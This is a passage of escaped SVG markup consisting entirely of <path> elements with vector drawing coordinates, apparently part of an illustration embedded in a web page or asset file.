d=\"M892.3,62.1c-4.3-.7-8.6-.3-4.6.6-.8-.4.2-.4,3,.2C886.9,61.8,895.8,63.1,892.3,62.1Z\"></path>\n        <path d=\"M1084.6,94.9c2.7.2,2.5-.4-1.5-1.1C1084.3,94.3,1081.9,94.3,1084.6,94.9Z\"></path>\n        <path d=\"M1051.7,88.7l-2.1-.3c-.6-.1-1.2-.2-1-.1,3.5.6-2.9,0,2.3.8C1049.9,88.6,1052.3,89,1051.7,88.7Z\"></path>\n        <path d=\"M897.1,61.9c2.5.4.9.6-.8.3-1.1-.3-1.9-.6-3.3-1,.3.3-2,.4,1.5,1.1,1.1-.5,1.5.6,5.3,1C900.7,63.4,901,62.3,897.1,61.9Z\"></path>\n        <path d=\"M1045.7,86.2c.3.3-.7.2-3-.2,0,.1.2.8,1.3.7C1042.4,86,1050.5,87.4,1045.7,86.2Z\"></path>\n        <path d=\"M1027.2,83.8a20.39,20.39,0,0,1,2.2.6c.5-.2,3.6-.1-.4-.8C1030.1,84.1,1028.3,83.9,1027.2,83.8Z\"></path>\n        <path d=\"M1008.3,78.7c-.3.2-2.9-.3-1.8.3a21.3,21.3,0,0,0,4.2.7c.2.2.1.4,2.3.7l-.3-.6C1009.4,79.3,1010.4,79.1,1008.3,78.7Z\"></path>\n        <path d=\"M769.3,36.9c1.4-.2-3.6-.7-3.3-.9,4.7.6-2.5-.9,1.8-.4-2-.3-2.4-.5-4.3-.8.3.9,2.5,1.9-1.1,1.8,3.3.8,1.3,1.4,4.9,2.3.1-.5,1.3-1-.9-1.9,1.1-.1,4.5,1,4.1.5C768.1,37,765.1,35.9,769.3,36.9Z\"></path>\n        <path d=\"M898.2,60.1l-5.2-.9c0,.3-1.8,0,1.3.7C894.2,59.6,898.2,60.4,898.2,60.1Z\"></path>\n        <path d=\"M856.5,51.7c1.3.6-2,0-2.9.1a17.84,17.84,0,0,1,3.3.8C857.9,52.6,858.8,52.2,856.5,51.7Z\"></path>\n        <path d=\"M795,42.2c-3-.7-.8-1.1-4.8-1.9C791.1,40.8,790.1,41.2,795,42.2Z\"></path>\n        <path d=\"M836.8,48.8c-.7-.5,2.7.2,2.9-.1-1.4-.2-2.3-.4-3.2-.6C837.7,48.6,833.5,48.1,836.8,48.8Z\"></path>\n        <path d=\"M911,60.6c-.3.2-4-.6-2.9,0C911.4,61.2,913.8,61.2,911,60.6Z\"></path>\n        <path d=\"M747.2,33.1a5.88,5.88,0,0,1-2-.2c0,.3.8.6,2.4,1C746.2,33.3,750.4,33.8,747.2,33.1Z\"></path>\n        <path d=\"M760.1,35.8c-.1-.4-1.2-.8-3.5-1.2,0,.2-3.4-.5-3-.2C756.3,34.9,756.9,35.3,760.1,35.8Z\"></path>\n        <path d=\"M1052.6,84.4c-.1-.2-.1-.3-.2-.5-2-.3-4.5-.7-4-.3,1.8.3,2.6.3,3.2.5C1051.6,84.2,1051.7,84.2,1052.6,84.4Z\"></path>\n        <path d=\"M889.9,57c-1.1-.5,2.6.2,2.9,0a28.82,28.82,0,0,1-4.3-.9C887.9,56.2,887.7,56.4,889.9,57Z\"></path>\n        <path d=\"M842.5,48.7c1.7.3.7.4,2.3.7-1.7-.7,5.7.6,1.8-.3C847.5,49.6,841.6,48.3,842.5,48.7Z\"></path>\n        <path d=\"M792.2,40.4c1.4-.4,3-1.3-2.2-2.6-3.1-.2,2.2,1.1,1.6,1.4a19.06,19.06,0,0,0-3.1-.4C792.8,39.5,789.2,39.7,792.2,40.4Z\"></path>\n        <path d=\"M893.8,56.9c0-.3,1.7-.2,1.7-.5C892.6,55.9,891.5,56.4,893.8,56.9Z\"></path>\n        <path d=\"M823.4,45.1c.5-.2,2.4.1,1.7-.4C822.8,44.4,819.8,44.5,823.4,45.1Z\"></path>\n        <path d=\"M772.8,36.3c1.3-.1.9-.5-2.5-1.2C770.4,35.4,771.1,35.8,772.8,36.3Z\"></path>\n        <path d=\"M1149.9,97.9c.7.4,1.2.8,4.5,1.3C1154.5,98.8,1152.9,98.4,1149.9,97.9Z\"></path>\n        <path d=\"M768.8,33.8c.8-.3-5.4-1.3-5.3-1C766.4,33.2,766.3,33.4,768.8,33.8Z\"></path>\n        <path d=\"M788,35.4c1.5.3,1.9.5,3.3.8-1.7-.8-1.4-1-2.7-1.7C788.6,34.9,787,34.8,788,35.4Z\"></path>\n        <path d=\"M757.2,29.7a24.5,24.5,0,0,0,3.5,1.2C760.6,30.5,760.9,30.2,757.2,29.7Z\"></path>\n        <path d=\"M822.2,40.4c3.2.5,4.3-.1,1.5-.9C824.5,40.1,819.4,39.6,822.2,40.4Z\"></path>\n        <path d=\"M792.7,35.2c3.8.6,4-.2-.5-1A7.77,7.77,0,0,1,792.7,35.2Z\"></path>\n        <path d=\"M771.3,30.8c-2.5-.4-2.5-.8-4.4-1.2,1,.7,1.1,1.4,5.9,2.3C773.3,31.5,766.8,30.3,771.3,30.8Z\"></path>\n        <path d=\"M755.5,28.2c2.7.2-2.4-1.1.5-.9-2.8-.4-2.2-.6-4.3-.9C753.8,27.2,751.7,27.1,755.5,28.2Z\"></path>\n        <path d=\"M769.3,28.7c-3.3-.6-1.8.1-3.9-.1,2.5.4,1.2.7,3.4,1.1a5.85,5.85,0,0,1,2,.2c-2.2-.9.8.1,1.9-.1C769.8,29,767.5,28.9,769.3,28.7Z\"></path>\n        <path d=\"M894.1,49.3c-3.4-.7-2.9.4.4.8C895.2,49.9,891.9,49.2,894.1,49.3Z\"></path>\n        <path d=\"M1097.3,82.7a4.69,4.69,0,0,0,2.5,1.3c-.6-.4,1.8.1.8-.4C1096.4,82.9,1101.5,83.4,1097.3,82.7Z\"></path>\n        <path d=\"M833,38.6c-.4.1-3.3-.4-1.9.1,1.2.2,3,.5,3.2.6s0,.3,1.2.5C836.9,39.8,834.7,39.2,833,38.6Z\"></path>\n        <path d=\"M768.9,27.8c-1,0-2-.1-3-.2.2-.2-.5-.5-2.3-.8-.4.3,2.5.9.3.7,2,.3,2.4.5,4.3.8C766.3,27.7,772.4,28.6,768.9,27.8Z\"></path>\n        <path d=\"M773.8,28c-.8.1-4.2-.6-2.9.1,1.6.2,3.9.7,4.1.6a10.32,10.32,0,0,1-2.2-.5C772.8,28,777.4,28.7,773.8,28Z\"></path>\n        <path d=\"M756.1,25.3c.2-.2,3.1.3,4,.2-2.4-.4-4-.7-5.2-.8C755.1,24.9,754.9,25,756.1,25.3Z\"></path>\n        <path d=\"M775.5,27.5c-.2.2-3.8-.5-4-.3,3.8.5,1.9.7,5.4,1.2C776.2,28.1,777.9,27.9,775.5,27.5Z\"></path>\n        <path d=\"M800.7,31.7c-5.5-1.1-2.1.5.2.5C798.3,31.7,800.5,31.7,800.7,31.7Z\"></path>\n        <path d=\"M767,25.8c.4.3,9,1.8,5.2.9,0,.1-.1.1-1-.1-.2-.2,0-.3-1.2-.5C770.1,26.3,767.2,25.7,767,25.8Z\"></path>\n        <path d=\"M798.2,30.4c-4.8-.6-3.8-.4-6.4-1.3-.3.3-.2.4-2.8.2,3.2.7,4.3.7,7.5,1.5,1.1,0,1.1-.1-.2-.5C797.5,30.4,798.7,30.6,798.2,30.4Z\"></path>\n        <path d=\"M775,26.4c-3.3-.6-4.2-.6-5.1-.5,1.8.3,3.3.6,4.3.8C773.9,26.4,775.3,26.6,775,26.4Z\"></path>\n        <path d=\"M868.2,41.4c-.6.3,5.7,1.5,6.5,1.4C872.5,42.4,870.4,41.9,868.2,41.4Z\"></path>\n        <path d=\"M1213.9,98.1c-.4.2-2.2.4,1.4,1C1214.6,98.7,1216.3,98.5,1213.9,98.1Z\"></path>\n        <path d=\"M1148.4,86.3c-1.6-.1-.9.7,2.5,1.3A7.85,7.85,0,0,0,1148.4,86.3Z\"></path>\n        <path d=\"M1152.3,82.2c-1.8,1.1-9.7,2-4.9,4.1,4.7,0,9.5-.3,3.7-2.5,1.9,0,2.6.8,4.2.7C1151.7,83.3,1155.1,82.7,1152.3,82.2Z\"></path>\n        <path d=\"M911.4,47c-.8-.4.1-.3,1.2-.2s2.4.3,2.7.3a22.5,22.5,0,0,0-2.7-.5C910,46.2,907.8,46.3,911.4,47Z\"></path>\n        <path d=\"M860.1,36.5a5.77,5.77,0,0,0-2.3,1.2c2.7.4,4,.5,4,.2C857.7,37.1,863.6,37.4,860.1,36.5Z\"></path>\n        <path d=\"M756.2,19.3c-1.5-.1-6.4-.6-2.8.3C752,18.9,759.3,20,756.2,19.3Z\"></path>\n        <path d=\"M842,33.1c5.8,1.3,3.8,1.5,5.8,2.1.2-.2,4.9.8,4,.2-4.6-.6-3-.9-4.5-1.4C844.1,33.5,845.3,33.7,842,33.1Z\"></path>\n        <path d=\"M850.7,35c1.5.3,1.9.5,3.2.8-1.7-.8-.4-.7.5-1C851.1,34.2,850.1,34.4,850.7,35Z\"></path>\n        <path d=\"M1133.4,81.1c-4.5-.8-3.3,0,.3.6Z\"></path>\n        <path d=\"M890,40.4c-2.4-.1,1.4.8,3.5,1.2C894.2,41.3,891.5,40.8,890,40.4Z\"></path>\n        <path d=\"M820.8,29a41.32,41.32,0,0,0-5.2-.8c1.7.3.7.4,2.3.7.1-.1-.4-.4.9-.2S821,29.3,820.8,29Z\"></path>\n        <path d=\"M851.3,34.3c1.7.1.1-1-2.4-1.1C852.2,33.9,846.6,33.5,851.3,34.3Z\"></path>\n        <path d=\"M741.7,15.1c.2.2-.7.1-2-.2.7.3-.9.5,1.4.9C739.4,15.1,745.5,16,741.7,15.1Z\"></path>\n        <path d=\"M912.7,44.2c1.7.2,2-.1.1-.5h-.1c-.4.1-2-.1-1.7.2C911.6,44,912.2,44.1,912.7,44.2Z\"></path>\n        <path d=\"M755.6,15.7c-3.7-.6-3.3-.9-6.5-1.4,3.3.9,1.6,1.2,4.8,1.9C752.3,15.5,755.3,16,755.6,15.7Z\"></path>\n        <path d=\"M862.3,32.9c1.5.6-5.3-.2.4.8C861.7,33.3,865.6,33.6,862.3,32.9Z\"></path>\n        <path d=\"M909.2,40.2a5.13,5.13,0,0,0,2.4,1.1c1.2-.1-.3-.2.8-.4Z\"></path>\n        <path d=\"M855.6,31a5,5,0,0,0-2.3-.8c-.5.1-2,0-2.9.1a28.64,28.64,0,0,1,3.2.6C853.7,30.8,853.8,30.7,855.6,31Z\"></path>\n        <path d=\"M735,11.1c3.4.6,5,.7,5,.4A22,22,0,0,0,735,11.1Z\"></path>\n        <path d=\"M1217.9,88c-.1-.3-.7-.8.7-.7C1214.2,86.6,1215.8,87.4,1217.9,88Z\"></path>\n        <path d=\"M893.1,32.6c-.3-.4.5-.7-2.5-1.2C890.7,31.8,891.4,32.1,893.1,32.6Z\"></path>\n        <path d=\"M885,29.7c.6.6-3.4-.5-5.2-.8-.5.1-2,0-2.9.1,3.2.2,10.4,1.6,12.3,1.5C887.4,30.2,886,29.9,885,29.7Z\"></path>\n        <path d=\"M891.9,29.9c-1-.7-5.4-1.8-.6-1.2-3.1-.7-8.5-1.5-10.7-2.1a.35.35,0,0,0,.1.2c3.1.6,5.9,1.3,7.6,1.8C884.4,28.1,889.4,29.4,891.9,29.9Z\"></path>\n        <path d=\"M860.4,24.6c3.2.7,4.3.2,1.8-.3C861.8,24.5,859.3,24,860.4,24.6Z\"></path>\n        <path d=\"M1216.1,82c.9.7-.5.8,2.6,1.4C1218.6,83,1218.2,82.5,1216.1,82Z\"></path>\n        <path d=\"M872.3,25.2c-1.5-.4,0-.7-3.5-1.2C869,24.3,869,24.7,872.3,25.2Z\"></path>\n        <path d=\"M861.4,22.8c-1.8-.3-3.3-.6-4.3-.8a19.44,19.44,0,0,0,5.5,1.5C861.2,23.1,861.6,23,861.4,22.8Z\"></path>\n        <path d=\"M872.3,23.1c-2.3-.3-3.6-.4-4-.2,1.4.2,2.3.4,3.2.6C870.5,23.1,872.8,23.5,872.3,23.1Z\"></path>\n        <path d=\"M889.7,25.2c-2.6-.4-4.2-.5-6.1-.7,1.6.3,1.1.5,1.3.7,1.4.4,3.9.8,5.4,1.1-.1-.2-.2-.3-.2-.5a27,27,0,0,1-3.1-.5.3.3,0,0,0-.1-.2C888.7,25.6,890.4,25.7,889.7,25.2Z\"></path>\n        <path d=\"M879,23.1a15,15,0,0,1-2.1-.4,4.83,4.83,0,0,0-2.2-.6c-.4.2.9.6,2.2.9C877.8,23.1,878.7,23.3,879,23.1Z\"></path>\n        <path d=\"M883.5,20.2c4.6.8,2.6-.1,2.7-.4C880.8,18.9,885.4,20.1,883.5,20.2Z\"></path>\n        <path d=\"M868.9,15.9c-3.3-.5-6.3-.6-8.4-1.4.5.4-4-.6-2.9,0,4.3.5,8.4,1.6,11.5,1.9C865.9,15.8,870,16.3,868.9,15.9Z\"></path>\n        <path d=\"M887.4,18.3c-.8-.1-2.4.4,1.4.9C886.7,18.6,890.2,19,887.4,18.3Z\"></path>\n        <path d=\"M871.6,15.4a26.52,26.52,0,0,1,5.5,1.3c.3.1.6.1,1,.2-.6-.8,3.8-.5-.7-1.6.2.2,0,.2-.3.3s-.9.1-.3.5C875.3,16,871.3,15.2,871.6,15.4Z\"></path>\n        <path d=\"M911,19c-2.8-.6-4.8-.2-.8.4C909.2,18.9,911.6,19.4,911,19Z\"></path>\n        <path d=\"M900.4,17.1c4.9.8,8.6,1.3,12.4,1.7-3.4-.6-3.3-1-6.5-1.5C910.3,18.6,902,17,900.4,17.1Z\"></path>\n        <path d=\"M1309.9,84.2c.9.5-1.6.1-.7.5,2.4.4,4,.6,5.2.8C1314.5,85.1,1312.9,84.7,1309.9,84.2Z\"></path>\n        <path d=\"M874.8,11.9c.1.2-2.9-.4-3-.3,2.8.4,2.2.6,4.3.9C877.3,12.6,877.2,12.3,874.8,11.9Z\"></path>\n        <path d=\"M895.9,15.7c.3-.3-1.2-.7-4.4-1.2C891.8,14.9,893.2,15.3,895.9,15.7Z\"></path>\n        <path d=\"M885.9,12.9c1.1.4.3.6,3.4,1.1,1.4.1.8-.3.7-.7C886.5,12.7,889.4,13.7,885.9,12.9Z\"></path>\n        <path d=\"M886.6,12.3c-6-1.1-1.2.6,1.2.5C886.6,12.6,886.6,12.4,886.6,12.3Z\"></path>\n        <path d=\"M892.2,11.9c.2.4,2.9.9,4.5,1.4,1.2,0,5.4.3.7-.7C898.2,13.4,894.2,12.3,892.2,11.9Z\"></path>\n        <path d=\"M882.6,7.8c.3-.3,2.9-.3-1.3-.8C883.9,7.6,877.7,7,882.6,7.8Z\"></path>\n        <path d=\"M877.4,5.7a24.14,24.14,0,0,1-2.8-.5,6.24,6.24,0,0,0,2.8.7,44,44,0,0,0,5.5.4C880.1,5.6,879.4,5.9,877.4,5.7Z\"></path>\n        <path d=\"M768.7,106.5a14,14,0,0,0-4.6-1.5C766.1,105.4,766.2,106.4,768.7,106.5Z\"></path>\n        <path d=\"M910.8,116.3a31.2,31.2,0,0,1,5.4,1.2,9.92,9.92,0,0,1-2.5-1.3C910.4,115.7,911.6,116.3,910.8,116.3Z\"></path>\n        <path d=\"M917.6,103.9c1.5.2,5.5,1,5.2.8-4.3-1,1-.7-3.7-1.6,0,.3,1.3,1-1.7.5a5.7,5.7,0,0,0-2.3-.8c-.3.3,2.6,1.1,4.4,1.2C919.9,104.2,918.2,103.9,917.6,103.9Z\"></path>\n        <path d=\"M743,70a10.32,10.32,0,0,1-2.2-.5c-.1-.1.8,0,.9-.1-3.7-.6-1.2.4-.7.6C741.1,69.8,743.7,70.3,743,70Z\"></path>\n        <path d=\"M893.4,89.4c-.5.4-6.9-1.3-7.2-.9C890.1,89.3,896,90.1,893.4,89.4Z\"></path>\n        <path d=\"M823.8,75.1c-.6.5,1.2,1.1-1.5,1,2.1.3,1.5.5,4.3.9C823.9,76.2,830,76.1,823.8,75.1Z\"></path>\n        <path d=\"M903.3,87.9c3.6.5,3.3.2,6.3,1a12.75,12.75,0,0,1,3.9.1,1.68,1.68,0,0,0,1,.2c-1.1-.4-3.6-.8-4.4-1.2,2.3-.2,2-1,5.4-.9-3.4-.7-2,0-4-.3-.1-.1-.2-.2-1.1-.3.6-.2,4.7.5,5,.3-4.4-.8,1-.3-2.4-1-1.6,0-.4.7-3.8.3.2-.2,1.7-.4-1.5-1.1q.45.45-1.8.3c-1.6-.6,2.3-.3-.4-.8-2.6.4-11.5.7-12,1.2,1.5.1,0-.6,3.9.1-1.2.2-.2.3,3.3.8-.2.2-3.5-.4-2.9.1C902,87.1,906.1,88,903.3,87.9Z\"></path>\n        <path d=\"M945.6,93.3c5.7,1.3,5.4,2.2,12.3,3.5-1.5-.5,2.8,0-.3-.6C954.3,96.3,950,93.7,945.6,93.3Z\"></path>\n        <path d=\"M928.2,89.2c-3.7-.6,2,0-1.2-.5-7.4-.5-1.7,1.7-4.1,1.5,2.1.3,4.5,1.2,6.3,1.2C922.7,90,925.6,89.1,928.2,89.2Z\"></path>\n        <path d=\"M1057,110.4a8.82,8.82,0,0,1,2.9,0c0,.3-1.8,0,1.3.7,2.2.1-1.5-.9-3.5-1.4C1059.2,110.4,1053.9,109.7,1057,110.4Z\"></path>\n        <path d=\"M931.9,88.8c-6.7-1.2-.3.9,1.3.8C930.9,89.2,932.5,89.1,931.9,88.8Z\"></path>\n        <path d=\"M914,85.9c2.5-.6.8-1.8,3.7-2.4-3.2-.3-3.1-.7-4.2-.7,2.2,1.3,1.6,1.7-4.2,1.3,2.7.5,4.1.9,4.4,1.2-1.8-.3-3.3-.5-4.1-.6C909.9,85,911.4,85.4,914,85.9Z\"></path>\n        <path d=\"M1047.5,98.3c-.1.1.3.4-.9.2,0-.3.3-.5,1.8-.4,3.3.5,8.4,1.8,9.6,1.8-4.3-.9-9.4-2.4-4.8-2-3.5-.7-.6.3-4.1-.5.2-.1,1.4,0,.8-.3a19.25,19.25,0,0,0,3.1.5c-1.4-.6,1.5,0,1.9-.1-6.2-1.1-3,.2-10.2-1.1-5.8.1,1.8,3.1-3.2,3.5,1.6.5,2.1.4,3.3.8-3.4-.4,0,.4-1.7.5a16.33,16.33,0,0,1,4.4,1.1,26.85,26.85,0,0,1-4.1-.5c-1.8-.4-.2-.6-2.4-1,.6.3-2.9.1-.7.5a47.56,47.56,0,0,1,7.4,1.3c3-.2.1-1.3-3.1-2.4,0,.1-.8,0-1-.2,2.4.4,1-.2,3,.2s1.7.8,3.5,1.2a18.21,18.21,0,0,1,3.2.5C1049.1,100.1,1053.7,100.2,1047.5,98.3Z\"></path>\n        <path d=\"M797,27.8c-1.8-.1-3.1-.7-5.2-.8,6.4,1.5,1.7,1.5,6.2,2.9-2.5-1.3,4.3-1.5-2.6-3.4a6.52,6.52,0,0,0,1.7-.3c-1.1,0-4.9-1.1-6.2-.9C794.5,26.2,791.2,26.6,797,27.8Z\"></path>\n        <path d=\"M861.8,6.9c5,.9,1.6.4,1.3.7q3.45.6,3.3.9a12.79,12.79,0,0,0-2.9.1c3.6.5,4.4.3,7,.5a35.67,35.67,0,0,1-5.4-1.2c.2-.2,3.1.3,4,.2-2.7-.4-4.5-.8-4.4-1.1C863.3,6.8,861.5,6.6,861.8,6.9Z\"></path>\n        <path d=\"M910.5,13.7c-3.1.2-6.8-.5-13.2-1.3,2.4.8,3.9.6,5.3,1-2.8-.3,1.9.8,2.4,1.1-1,.7-3.4.8,0,2.1-1.9-.2-3.7-.9-4.2-.7,3.7.5,1.1.7,4.4,1.2-1.6-.8-.6-.2,3.1.4-.7-.4-1.8-.9-2.5-1.3,1.2,0,3.9.5,5.1.5-3.2-.6,2.3.2.8-.3-3-.6-2.7-.3-5.2-.8a8.44,8.44,0,0,0-1.2-.4c2.5.3,4.8.7,5,.4a27,27,0,0,1-3.1-.5c1.9.3-2.7-1.4,2.9-.1.1-.2-1.3-.8,1.9-.1C909.1,14,915.8,14.8,910.5,13.7Z\"></path>\n        <path d=\"M922.9,80c.8-.1,2.8.2,1.8-.4C921.5,79,922.3,80,922.9,80Z\"></path>\n        <path d=\"M887.1,73.8c-.1-.2-.2-.3-.2-.5-2.5-.5-2.2-.2-5.2-.7-.3-.3.8-.4-2.3-.8a11.18,11.18,0,0,0,3.5,1.2C883.7,72.8,885.7,73.6,887.1,73.8Z\"></path>\n        <path d=\"M1027,96.2c.8.1,1.5.3,2.3.4,2.9-.2,1.2-.7,3.5-.7C1029.4,95.4,1028.3,96.2,1027,96.2Z\"></path>\n        <path d=\"M1047.2,95.7c-1.7-.1-6.4-.5-3.8.1C1042.6,95.2,1049,96.6,1047.2,95.7Z\"></path>\n        <path d=\"M924.7,75.5c4.7.9,2-.1,6.1.7,2.2.7-.8.4,1.4.9-1-.6,7,.8,5,.3a39,39,0,0,1-6.5-1.4c1.9.1,1.7-.2.7-.5-1.8-.1-1,.7-5-.3C927.2,75.6,923.4,74.9,924.7,75.5Z\"></path>\n        <path d=\"M746.9,45.1a23.56,23.56,0,0,1,4.1.5,12.3,12.3,0,0,0-3.4-1.1C750.8,45.2,743.9,44.7,746.9,45.1Z\"></path>\n        <path d=\"M1022.3,87.9l.3.6a18.2,18.2,0,0,0,3.1.5C1023.4,88.6,1025.6,88.4,1022.3,87.9Z\"></path>\n        <path d=\"M810.2,50a13,13,0,0,1-3.1-.4c1.2.7-1.6-.1-1.9,0,1.11.21,2.21.48,3.3.8-2.6-.5-2.5.1-.7.7-.8-.4.2-.4,3,.2.4.6,1.1.6.4,1,4.3.7,2,1,5.6,1.6-4.1-1.2.1-1.4-8.2-3.2C807.4,50,813.6,50.9,810.2,50Z\"></path>\n        <path d=\"M1046.7,90.4c3.2.4,1.4-.5,3.7-.4,5.9,1.4,7.3,2.7.9,1.9-1-.5,1.3-.1.8-.4-3.7-.5-4.4.6.7,1.4-.5-.9,4.8-.2,7.7-.2-1.2-.2-3-.5-3.2-.6,5.3,1,.3-.3,3.9.1-1.5,0,3.7.9,3.2.6-2.5-.4-2.5-.8-4.4-1.2.9.4-2.1-.1-3-.2.2-.2-1.5-.5-2.3-.7,4,.4,5.5.8,7.1.6-3.4-.6-3.1-.3-5.3-.9,1.4.7-3.5-.3-3.9-.1-.1-.1-.1-.2-.2-.4-1.4-.2-2.8-.5-4.2-.7C1049.9,90.2,1045,89.9,1046.7,90.4Z\"></path>\n        <path d=\"M1055.8,93.2a47.23,47.23,0,0,0,4.9.2C1056.2,92.5,1054.6,92.9,1055.8,93.2Z\"></path>\n        <path d=\"M1202.1,116.5c2.6.5,2.2.2,5.2.8C1207,116.2,1206,116.7,1202.1,116.5Z\"></path>\n        <path d=\"M948.2,74c4.8.6,3.5-.2,2.1-.9-.7-.4-1.5-.7-1-.8-3-.3-1.4.3-.2.8.9.4,1.6.8-.1.7-3.6-.6,2.6,0-2.3-.7C947.5,73.4,945.9,73.6,948.2,74Z\"></path>\n        <path d=\"M901,66.1c1.4.2,2.8.5,4.2.7C906.2,65.9,904.9,66.5,901,66.1Z\"></path>\n        <path d=\"M961.1,74.7c-1.3-.2-5.6.3-1.5.9C957.4,75,961.7,75.2,961.1,74.7Z\"></path>\n        <path d=\"M986.7,77.8c.3.5-6.9,1.1.9,1.9C988.9,79.3,989.9,79.1,986.7,77.8Z\"></path>\n        <path d=\"M817.5,49c-5.5-.9-6-2.7-2.1-2.5.8.6.4.8,1.5,1.3-.1-.2,2.9.4,3,.3-.3-.2-.8-.9-3.5-1.2,3,.3.6-.5,1.7-.5-3.1-.4-5.6-1.3-3.4-1a2.57,2.57,0,0,0,1.1.4c6.4-.1-3.8-3.2,4.5-2.8-1.5-.5-5.1-.7-5.3-1,5.7.4-2.3-2,4.1-1.7-1.08-.15-2.14-.35-3.2-.6,2.8.3,1.6-.9-.6-1.2.9-.3,3.6-.2,8.1.8-4.4-1.2,1.7-.3-.5-1-1.6.3-3-.9-6.5-1.4-.5.5-1.3.6,1.6,1.4-7.5-.1-1.9,2.5-4.3,3.3a32.89,32.89,0,0,1-5.2-.9c2.9.9,4.4,1.8,1.8,1.7,2.9.5,3.2.8,3.4,1.1-1.3-.2-1.5-.4-3.2-.6,0,.2.6.3,1.2.5-1.1-.2-1.3-.3-2.2-.5,1.6.6-2.6.1.3.7a6.05,6.05,0,0,1,1.9,0c-.1.2,1.3.5,1.3.7-4-.8-1.8,0-5.1-.6,3.1.9,3.4,1.1,1.6,1.4a24.16,24.16,0,0,1,4.3.9c-5-1.1-3.9.1-1.6.7-1.4-.2-2.3-.4-3.2-.6,1.2.9.9,1.6-2.1,1.6,4.7.7,3.3,1.3,2.6,1.4-1.3-.3-2.4-.5-3.3-.8,3,.7,2.7,0,.8-.3.9.8-3.3-.1-5-.3a72,72,0,0,0,10.6,2c-.4-.4-2.6-1.7,1.5-.9-3-.4,1.7.5,1.2.5-.6.4.4.5-.6.8a14,14,0,0,1,3.2.8c0-.2,3.4.5,3,.2C815.3,50.2,822.3,50.4,817.5,49Z\"></path>\n        <path d=\"M983.5,77.3c-.2-.4-3.9-1.1-5.6-1.6C975,74.8,979.8,76.8,983.5,77.3Z\"></path>\n        <path d=\"M888.4,59.9c2.4.2,1.7-.3-1.4-1,.6.9,1.9,1.6,0,2,1.4.2,4.1,1.1,4.3.8-3.7-1-.3-1,2.4-1C891.1,60.2,891.4,60.5,888.4,59.9Z\"></path>\n        <path d=\"M1043,84.4c-1.7.2,2.5,1,.6,1.2,6,1,.4-1-1.7-1.6-.4.1-5.1,0-2.8.2C1040.8,84.4,1040.5,84.1,1043,84.4Z\"></path>\n        <path d=\"M789.8,41.4c-6.2-1.1,1.8-.1-3.4-1.1.4.3-1.3,0-1.9,0,5.8,1.2-1.2.9,2.8,1.9C786.8,41.6,787.1,41.2,789.8,41.4Z\"></path>\n        <path d=\"M792,42c.1.4-3.6-.8-3.1-.4,1,.3.4.4,1.4.9,1.4.2,2.8.5,4.2.7C794.1,42.8,795,42.5,792,42Z\"></path>\n        <path d=\"M896.8,59.3c-.4-.3,5.4.5,1.8-.4.5.3-3-.4-3-.2,2.3.5-1.4.3,2.4,1.1.4-.2,1.7.5,3.2.6C902.2,60.2,897.6,59.7,896.8,59.3Z\"></path>\n        <path d=\"M1015.1,78.7c3.3.6,1.9,0,5.1.6,0-.1-.1-.2-.2-.4C1017.3,78.6,1017.2,78.9,1015.1,78.7Z\"></path>\n        <path d=\"M905.3,56.6c-5.8-.8-5.7-.6-10.3-1.4-.1.5,2.2,1-.6.8,7.5,1.4.4,1.3,2.8,1.9,2.6.2,0-.9,4.8-.1,2.6.6-1.7,0,1.3.7-.2-.6,1.4-1-1.9-2,3,.6,2.6.3,5.2.8C906.7,57.1,905.2,56.8,905.3,56.6Z\"></path>\n        <path d=\"M1143,95.6c-.8-1.1-4.4-2.8-.3-2.8-3.8-.5-1.7,0-4.3-.8,1.7,1-8.7.1-3.1,1.7a19.06,19.06,0,0,0-3.1-.4c4.5.7.7.5-.8.3,2,.9-.5,1.3-1,1.9,2.5.3,5.2,1.1,5.3.9-1.5-.3-1.3-.5-2.3-.7,6.5,1.1,4.9.5,9.3,1.2-4.8-.9,1.4-1-3.7-1.7C1139,95,1142.5,95.7,1143,95.6Z\"></path>\n        <path d=\"M792.2,36.3c-2.7,0-.7,1.1,1.9,2-1-.6,1-.4.6-.8C790.2,36.8,796.2,37,792.2,36.3Z\"></path>\n        <path d=\"M902.9,53.5c2.6.5,3.4.8,4.1.6-2.8-.4.7-.5-3.4-1-.9.1,3.3.9.2.5-3.9-1.1-2.7-1.8-1.9-2-6.7-1.4-3.7.6-3.3,1.1l-2.1-.3c.7-.2-1.8-.6-2.4-1,.3-.2,2.1.1,1.8-.3-3.5-.6-1.5.2-2.8.2,1.1.4,3.4.9,3.5,1.2-4.4-.5-.7.6-3.6.5q3.45.6,3.3.9a19.07,19.07,0,0,0-2-.2c0-.2-.9-.4-2.3-.7,1,.6-.2.7-2.7.4,3.6.4.8.5,3.3.9,2.3.2-1.5-1.1,3.9,0-.3.1-1.4,0-.8.3,4.5.8,5.3.8,8.5,1.6.9-.3-3.7-1-3.5-1.4,3.7.7,5.5,1.3,6.2.9-4.2-.7-6.3-1.3-6.6-1.8C905.2,55.2,901.7,53.6,902.9,53.5Z\"></path>\n        <path d=\"M753.8,28.6c3.9.5,2.2.7,5.4,1.1,1.5.1-.7-.9-2.3-.7-.3-.3,4.9.1-.4-.8,1.5.8-1.8.6-4-.2-2.9-.3,2.1,1.4-2.6.6,3.2.8,2.3.9,3.6,1.5C756.8,30.2,750.3,28.4,753.8,28.6Z\"></path>\n        <path d=\"M866.5,46c-1.6,0-6.8-1.1-5.1-.6,5.5,1,2.2,1.3,5.6,1.7C866.2,46.8,865.9,46.4,866.5,46Z\"></path>\n        <path d=\"M752.4,25.5c-4.1-.5-10.9-1.9-13.6-2.1,5.3,1,5.7,1.6,9.9,2.5C746.1,24.9,749.4,25.3,752.4,25.5Z\"></path>\n        <path d=\"M894.3,47.7c-2.1.2,1.6,1.5-1.4,1.2,7,1.2,3.5,1,5.7,1.8,2,.4,2.3.3,4.1.6-.1-.2-.2-.5-.3-.7-4.2-.8-1.7-1.1-1.5-1.1a42.22,42.22,0,0,0,4.3.8c.3-.2-2-.6-1.3-.8-3.5-.7-.6.3-4.1-.5.7-.2-1.6-.6-1.3-.8,5.9.6,5.2-.4,3.3-1.2C894.9,46.2,899.5,49.3,894.3,47.7Z\"></path>\n        <path 